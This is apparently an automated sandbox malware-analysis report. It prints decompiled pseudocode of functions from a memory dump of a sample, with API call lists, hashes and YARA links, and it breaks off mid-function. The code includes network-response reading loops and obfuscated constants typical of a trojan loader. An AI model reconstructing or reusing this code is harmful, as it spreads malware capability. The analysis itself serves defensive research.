0x02c85f15
0x02c85f16
0x02c85f18
0x02c85f1c
0x02c85f20
0x00000000
0x00000000
0x02c85f26
0x02c85f2f
0x02c85f35
0x02c85f3f
0x02c85f43
0x02c85f45
0x02c85f52
0x02c85f56
0x02c85f5e
0x02c85f63
0x02c85f75
0x02c85f77
0x02c85f7d
0x02c85f7d
0x02c85f86
0x02c85f86
0x02c85f88
0x02c85f8e
0x02c85f8e
0x02c85f91
0x02c85f97
0x02c85f9a
0x02c85fa3
0x00000000
0x00000000
0x00000000
0x02c85fa3
0x02c85ef7
0x02c85ef1
0x02c85eda
0x02c85fa9
0x02c85fa9
0x02c85faf
0x02c85faf
0x02c85fb5
0x02c85fb5
0x02c85fbe
0x02c85fc4
0x02c85fc4
0x02c85e81
0x02c85fcd

APIs

SysAllocString.OLEAUT32(02C8C2B0), ref: 02C85E8C
lstrcmpW.KERNEL32(00000000,0076006F), ref: 02C85F6D
SysFreeString.OLEAUT32(00000000), ref: 02C85F86
SysFreeString.OLEAUT32(?), ref: 02C85FB5

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 2199074e1e5c75d798fb55ba6b4092c9a0c9feb6c87cf1682f901505f5749b25
Instruction ID: f4826cc7e36ae67ccd43278f9e2363b83d3274e9c5c7743402e7520690c00087
Opcode Fuzzy Hash: 2199074e1e5c75d798fb55ba6b4092c9a0c9feb6c87cf1682f901505f5749b25
Instruction Fuzzy Hash: BF517175D00519EFCB00EFA8C88899EB7B6EF88748B158995F905EB210D7729E01CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02C88D85, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E02C88D85(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E02C88483(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E02C8A60F(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E02C82215(_t101,  &_v236, _a8, _t96 - _t81);
					E02C82215(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E02C8A60F(_t101,  &E02C8D1B0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E02C8A60F(_a16, _a4);
						E02C8A624(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L02C8B078();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L02C8B072();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E02C84607(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E02C85151(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E02C86911(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E02C8D1B0) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x02c88d88
0x02c88d94
0x02c88d9a
0x02c88d9f
0x02c88da3
0x02c88f00
0x02c88f04
0x02c88f04
0x02c88da9
0x02c88dad
0x02c88db1
0x02c88db4
0x02c88dbf
0x02c88dc5
0x02c88dca
0x02c88dcd
0x02c88de7
0x02c88df3
0x02c88dfc
0x02c88e06
0x02c88e0b
0x02c88e0d
0x02c88e10
0x02c88ebe
0x02c88ec4
0x02c88ed5
0x02c88ee8
0x02c88ef8
0x00000000
0x02c88efd
0x02c88e19
0x02c88e20
0x02c88e24
0x02c88e2a
0x02c88e2c
0x02c88e2e
0x02c88e30
0x02c88e32
0x02c88e3c
0x02c88e41
0x02c88e43
0x02c88e45
0x02c88e46
0x02c88e47
0x02c88e48
0x02c88e4f
0x02c88e56
0x02c88e59
0x02c88e59
0x02c88e26
0x02c88e26
0x02c88e26
0x02c88e61
0x02c88e69
0x02c88e72
0x02c88e77
0x02c88e77
0x02c88e7c
0x00000000
0x00000000
0x02c88e7e
0x02c88e81
0x02c88e8b
0x00000000
0x00000000
0x02c88e8d
0x02c88e8d
0x02c88e97
0x02c88e77
0x02c88e7c
0x00000000
0x00000000
0x00000000
0x02c88e7c
0x02c88ea1
0x02c88ea4
0x02c88ea7
0x02c88eae
0x02c88eae
0x02c88ebb
0x00000000
0x02c88ebb
0x02c88db6
0x02c88dba
0x02c88dbb
0x02c88dbd
0x00000000
0x00000000
0x00000000
0x02c88dbd
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 02C88E32
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 02C88E48
memset.NTDLL ref: 02C88EE8
memset.NTDLL ref: 02C88EF8

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 41d7cb4767606b7e0bb415d2f827e4e45227e9e56efeff7f61b75a48664b9289
Instruction ID: 065380dfe066e8e82a9be6e64de9f0a47eeab60fa0eb822337be0194a126639e
Opcode Fuzzy Hash: 41d7cb4767606b7e0bb415d2f827e4e45227e9e56efeff7f61b75a48664b9289
Instruction Fuzzy Hash: 8741A572A00259ABDB10EFA8CC40FEE7775EF45718F40C629F915A7280EB70AA549F90

Uniqueness

Uniqueness Score: -1.00%

Function 02C8A961, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000008,73B74D40), ref: 02C8A973

Part of subcall function 02C87E20: RtlAllocateHeap.NTDLL(00000000,00000000,02C88112), ref: 02C87E2C

ResetEvent.KERNEL32(?), ref: 02C8A9E7
GetLastError.KERNEL32 ref: 02C8AA0A
GetLastError.KERNEL32 ref: 02C8AAB5

Part of subcall function 02C8A5FA: HeapFree.KERNEL32(00000000,00000000,02C881B4,00000000,?,?,00000000), ref: 02C8A606

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
String ID:
API String ID: 943265810-0
Opcode ID: cd9f11a30da9dea79e7ab175f7087f5d2eb91d55ad4e7678aa038769e57c6574
Instruction ID: 3ccfb7eb8b168c4fbfc97b52a3034b3f5a210dc72da27cc9e293649c087301ba
Opcode Fuzzy Hash: cd9f11a30da9dea79e7ab175f7087f5d2eb91d55ad4e7678aa038769e57c6574
Instruction Fuzzy Hash: 3B418D71940604BFD721AFB1DD88EAB7BBDEF88708B108A2AF50392590E7319655CF60

Uniqueness

Uniqueness Score: -1.00%

Function 02C812F8, Relevance: 6.1, APIs: 4, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E02C812F8(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0x2c8d138() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x2c8d168(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E02C87E20(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0x2c8d138() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E02C866BA( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E02C8A5FA(_v16);
										if(_t64 == 0) {
											_t64 = E02C849F6(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E02C866BA( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E02C85053(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}

0x02c812f8
0x02c812f9
0x02c812ff
0x02c8130a
0x02c8130a
0x02c8130c
0x02c81950
0x02c81955
0x02c81957
0x02c8195c
0x02c8195d
0x02c81962
0x02c81963
0x02c8196e
0x02c8199f
0x02c819a4
0x02c81a67
0x02c819aa
0x02c819b1
0x02c819b9
0x02c81a64
0x02c819bf
0x02c819c4
0x02c819c9
0x02c819ce
0x02c81a56
0x02c819d4
0x02c819d4
0x02c819d6
0x02c819dc
0x02c819dd
0x02c819dd
0x02c819e0
0x02c819e3
0x02c819e9
0x02c819ee
0x02c819ef
0x02c819f4
0x02c819f7
0x02c81a02
0x00000000
0x00000000
0x02c81a0a
0x02c81a12
0x02c81a1e
0x02c81a22
0x02c81a24
0x02c81a29
0x00000000
0x00000000
0x02c81a29
0x02c81a22
0x02c81a3b
0x02c81a3e
0x02c81a45
0x02c81a50
0x02c81a50
0x00000000
0x02c81a2b
0x02c81a2b
0x02c81a30
0x02c81a32
0x02c81a33
0x02c81a36
0x00000000
0x02c81a36
0x00000000
0x02c81a30
0x02c819dd
0x02c81a57
0x02c81a57
0x02c81a5d
0x02c81a5d
0x02c819b9
0x02c81970
0x02c81976
0x02c8197e
0x02c81997
0x02c81999
0x00000000
0x00000000
0x02c81980
0x02c8198a
0x02c8198e
0x02c81994
0x00000000
0x02c81994
0x02c8198e
0x02c8197e
0x02c81a70
0x02c81301
0x02c81301
0x02c81308
0x02c81313
0x00000000
0x00000000
0x00000000
0x02c81308

APIs

ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,73BB81D0), ref: 02C81957
GetLastError.KERNEL32(?,?,?,00000000,73BB81D0), ref: 02C81970
ResetEvent.KERNEL32(?), ref: 02C819E9
GetLastError.KERNEL32 ref: 02C81A04

Part of subcall function 02C85053: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,73BB81D0), ref: 02C8506A
Part of subcall function 02C85053: SetEvent.KERNEL32(?), ref: 02C8507A

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$ObjectSingleWait
String ID:
API String ID: 1123145548-0
Opcode ID: 73f8692bc9417a1f54c27e191984714ade4a2058a665f0e83a1213ceeba09a89
Instruction ID: 01168faf8a1d411ee045392f89064bd4de2b19ff14979a8ff1db72b2c07f0abb
Opcode Fuzzy Hash: 73f8692bc9417a1f54c27e191984714ade4a2058a665f0e83a1213ceeba09a89
Instruction Fuzzy Hash: 0241B832940604AFCB21BBA5CC44BAE77FAEF84368F18C525E559D7190E7B0DA43DB60

Uniqueness

Uniqueness Score: -1.00%

Function 02C88C8E, Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E02C88C8E(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x2c8d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x2c8d2a4; // 0x245a5a8
				_t3 = _t8 + 0x2c8e862; // 0x61636f4c
				_t25 = 0;
				_t30 = E02C864A0(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x2c8d2a8, 1, 0, _t30);
					E02C8A5FA(_t30);
				}
				_t12 =  *0x2c8d25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E02C87F56() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E02C84EEC(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x2c8d110( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E02C84359(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x02c88c8f
0x02c88c96
0x02c88ca0
0x02c88ca4
0x02c88caa
0x02c88cb9
0x02c88cc0
0x02c88cc4
0x02c88cd6
0x02c88cd8
0x02c88cd8
0x02c88cdd
0x02c88ce4
0x02c88d3b
0x02c88d3b
0x02c88d41
0x02c88d43
0x02c88d43
0x02c88d4d
0x02c88d51
0x02c88d63
0x02c88d63
0x02c88d67
0x02c88d6d
0x02c88d6d
0x00000000
0x02c88cfd
0x02c88d02
0x02c88d0a
0x02c88d0e
0x02c88d12
0x02c88d12
0x02c88d1f
0x02c88d23
0x02c88d27
0x02c88d7c
0x02c88d82
0x02c88d82
0x02c88d35
0x02c88d39
0x02c88d70
0x02c88d72
0x02c88d75
0x02c88d75
0x00000000
0x02c88d72
0x02c88d39
0x00000000
0x02c88d23

APIs

Part of subcall function 02C864A0: lstrlen.KERNEL32(02C85D90,00000000,00000000,00000027,00000005,00000000,00000000,02C841C3,74666F53,00000000,02C85D90,02C8D00C,?,02C85D90), ref: 02C864D6
Part of subcall function 02C864A0: lstrcpy.KERNEL32(00000000,00000000), ref: 02C864FA
Part of subcall function 02C864A0: lstrcat.KERNEL32(00000000,00000000), ref: 02C86502

CreateEventA.KERNEL32(02C8D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02C886E3,?,00000001,?), ref: 02C88CCF

Part of subcall function 02C8A5FA: HeapFree.KERNEL32(00000000,00000000,02C881B4,00000000,?,?,00000000), ref: 02C8A606

WaitForSingleObject.KERNEL32(00000000,00004E20,02C886E3,00000000,00000000,?,00000000,?,02C886E3,?,00000001,?,?,?,?,02C8858E), ref: 02C88D2F
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,02C886E3,?,00000001,?), ref: 02C88D5D
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02C886E3,?,00000001,?,?,?,?,02C8858E), ref: 02C88D75

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 58a9c2d067114fe73fa74021b29e06750d57ca8a58694dc053555933413a99e2
Instruction ID: a2fa24fccb49028ef488903a79d6921dc29a2e48ea91baf09a29ddec9562ce76
Opcode Fuzzy Hash: 58a9c2d067114fe73fa74021b29e06750d57ca8a58694dc053555933413a99e2
Instruction Fuzzy Hash: 0021253294060A5BCB317A689C84B2B7299EFD9B6CB558B26FE06D7140F720CE008790

Uniqueness

Uniqueness Score: -1.00%

Function 02C85053, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E02C85053(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x2c8d140; // 0x2c8ad31
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E02C87E20(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E02C8A5FA(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E02C866BA( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x02c85053
0x02c85053
0x02c8505d
0x02c85063
0x02c85066
0x02c8506a
0x02c85070
0x02c85075
0x02c8508e
0x02c85091
0x02c85095
0x02c85099
0x02c8509a
0x02c8509f
0x02c850a2
0x02c850a9
0x02c850b0
0x02c85103
0x02c85109
0x02c8510f
0x02c8514a
0x02c85150
0x00000000
0x00000000
0x00000000
0x02c8510f
0x02c850b6
0x00000000
0x02c850bd
0x02c850cb
0x02c850ce
0x02c850d1
0x02c850dd
0x02c850e1
0x02c85143
0x02c850e3
0x02c850e6
0x02c850ea
0x02c850eb
0x02c850ec
0x02c850ee
0x02c850f5
0x02c85133
0x02c8513e
0x02c850f7
0x02c850fa
0x02c850fe
0x02c850fe
0x02c850f5
0x00000000
0x02c850e1
0x02c850b6
0x02c8507a
0x02c85080
0x02c85083
0x02c85088
0x00000000
0x00000000
0x00000000
0x02c85118
0x02c85120
0x02c85125
0x02c85128
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,73BB81D0), ref: 02C8506A
SetEvent.KERNEL32(?), ref: 02C8507A
GetLastError.KERNEL32 ref: 02C85103

Part of subcall function 02C866BA: WaitForMultipleObjects.KERNEL32(00000002,02C8AA28,00000000,02C8AA28,?,?,?,02C8AA28,0000EA60), ref: 02C866D5

Part of subcall function 02C8A5FA: HeapFree.KERNEL32(00000000,00000000,02C881B4,00000000,?,?,00000000), ref: 02C8A606

GetLastError.KERNEL32(00000000), ref: 02C85138

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 602384898-0
Opcode ID: 2e22c69dccefe3289ebc42481258188f6e61ecd8e014b15a7963ced6f6477b16
Instruction ID: c834a7d8fcd586e1e61e0625f14a588bb99ac5461b9ed18e4fcdae2591dd681e
Opcode Fuzzy Hash: 2e22c69dccefe3289ebc42481258188f6e61ecd8e014b15a7963ced6f6477b16
Instruction Fuzzy Hash: 0031E0B5D00309EFDB21EFA5CC84AAFB7B9FB48348F51C96AE542A2140D7709B459F60

Uniqueness

Uniqueness Score: -1.00%

Function 02C88634, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E02C88634(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E02C8A7FF(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E02C82884(_t23);
						}
					}
					return _t38;
				}
				if(E02C8A762(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x2c8d2a8, 1, 0,  *0x2c8d344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E02C82E7B(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E02C83F60(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E02C88371(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E02C88C8E( &_v32, _t39);
					goto L13;
				}
			}

0x02c88634
0x02c88641
0x02c88647
0x02c88648
0x02c88649
0x02c8864a
0x02c8864b
0x02c8864f
0x02c8865b
0x02c8865f
0x02c886e7
0x02c886e7
0x02c886ea
0x02c886ec
0x02c886f4
0x02c886f4
0x02c886fa
0x02c886fd
0x02c886fd
0x02c886fa
0x02c88708
0x02c88708
0x02c88672
0x02c88674
0x02c88674
0x02c8868b
0x02c8868f
0x02c88692
0x02c8869d
0x02c886a4
0x02c886a4
0x02c886ad
0x02c886b1
0x02c886bf
0x02c886b3
0x02c886b3
0x02c886b4
0x02c886b5
0x02c886b6
0x02c886b7
0x02c886b8
0x02c886b8
0x02c886c4
0x02c886c7
0x02c886cb
0x02c886cd
0x02c886cd
0x02c886d4
0x00000000
0x02c886d6
0x02c886d6
0x02c886e3
0x00000000
0x02c886e3

APIs

CreateEventA.KERNEL32(02C8D2A8,00000001,00000000,00000040,00000001,?,73BCF710,00000000,73BCF730,?,?,?,02C8858E,?,00000001,?), ref: 02C88685
SetEvent.KERNEL32(00000000,?,?,?,02C8858E,?,00000001,?,00000002,?,?,02C85DBE,?), ref: 02C88692
Sleep.KERNEL32(00000BB8,?,?,?,02C8858E,?,00000001,?,00000002,?,?,02C85DBE,?), ref: 02C8869D
CloseHandle.KERNEL32(00000000,?,?,?,02C8858E,?,00000001,?,00000002,?,?,02C85DBE,?), ref: 02C886A4

Part of subcall function 02C82E7B: WaitForSingleObject.KERNEL32(00000000,?,?,?,02C886C4,?,02C886C4,?,?,?,?,?,02C886C4,?), ref: 02C82F55

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: bedc008dc61f9a2120afc561fdcc98148496d2bd8b5622a560d7ddde11658e12
Instruction ID: 31e75bc865952220d5efdf6e5748c015300a3fa493d67bd0a3a3c04d72808d42
Opcode Fuzzy Hash: bedc008dc61f9a2120afc561fdcc98148496d2bd8b5622a560d7ddde11658e12
Instruction Fuzzy Hash: EF21A473D0021DABCF10BFE488849AE73B9EF8435CB45C626EA12E7500D7349A45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02C87EBE, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02C87EBE(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x2c8d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x2c8d250; // 0xdcefa20c
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x2c8d250 = _t23;
